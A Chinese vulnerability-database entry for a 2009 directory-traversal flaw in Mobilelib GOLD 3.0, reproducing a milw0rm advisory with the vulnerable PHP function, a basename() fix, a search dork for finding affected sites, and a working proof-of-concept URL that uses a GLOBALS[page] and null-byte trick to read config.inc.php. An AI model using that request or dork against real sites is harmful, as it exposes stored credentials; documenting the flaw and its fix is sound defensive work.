投稿
https://www.exploit-db.com/exploits/9144
https://www.securityfocus.com/bid/44186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-414
Ac4p mobilelib_gold 目录遍历漏洞
| 漏洞ID | 1118107 | 漏洞类型 | 路径遍历 |
| 发布时间 | 2009-07-14 | 更新时间 | 2009-07-14 |
 CVE编号
|
CVE-2009-3823 |  CNNVD-ID
|
CNNVD-200910-414 |
| 漏洞平台 | PHP | CVSS评分 | 4.3 |
|漏洞来源
|漏洞详情
MobilelibGOLD3.0版本的myhtml.php中存在一个目录遍历漏洞。攻击者首先需要上传一个恶意文件或注入任意指令到现有的文件,然后通过使用GLOBALS[page]参数,来发送一个特制的URL请求到myhtml.php脚本,以便确定一个来自本地系统的恶意文件。成功利用此漏洞可以在易受攻击的web服务器上获取敏感信息或执行任意代码。
|漏洞EXP
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
=Vuln: Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO: http://www.ac4p.com/
=BUY: http://www.ac4p.com/
=Download: ~~~
=DORK: intext:"English for dummies"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
Magic_quotes MUST BE ON :)
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align=\"center\"> áã ÃÓÊØÚ Ã…ÃÌÇà ãáà ÇáÞÇáÈ.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
We will bypass the security, where it takes all _GET variables and scans if
they contain harmful tags such as the null char (%00) ..etc
We will bypass it by using an old GLOBALS[] trick ;)
http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
$page = basename($page); //<---- Added the good old Basename func ;)
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align=\"center\"> áã ÃÓÊØÚ Ã…ÃÌÇà ãáà ÇáÞÇáÈ.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| Sec-Code.com ;) Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!! |
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
# milw0rm.com [2009-07-14]|受影响的产品
Mobilelib Mobilelib GOLD 3
|参考资料
来源:XF
名称:mobilelib-myhtml-file-include(51713)
链接:http://xforce.iss.net/xforce/xfdb/51713
来源:MILW0RM
名称:9144
链接:http://www.milw0rm.com/exploits/9144
检索漏洞
开始时间
结束时间